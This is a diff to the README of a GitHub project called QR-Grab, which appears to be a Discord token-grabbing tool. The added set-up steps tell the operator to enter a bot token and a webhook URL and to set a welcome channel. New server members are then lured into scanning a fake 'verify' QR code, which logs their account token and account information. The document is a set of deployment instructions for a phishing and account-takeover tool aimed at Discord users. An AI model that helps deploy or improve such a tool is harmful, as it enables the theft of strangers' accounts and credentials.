OmegaDevStudio/QR-Grab/README.md

 ## Set Up

-Place token where it states in main.py, run the file and should work.
+Place your bot token where it states in main.py and place a webhook url where it also states.
 Please remember to install any imports that are required.
 There is probably more I can do for user customisation, e.g changing the name of the bot and whatnot, however this is pretty simple and you probably are big brain.

+Once bot is running, you may run `!set <channel-id>` to set a specific channel as the welcome channel.
+Then whenever a user joins a server, they will be greeted by a welcome message to scan the QR Code.
+The user could also type !verify and should also generate a qr code.
+Once user has scanned the QR Code via the discord mobile app, the QR Code will log their token as well as their account information.

 ## Help & Support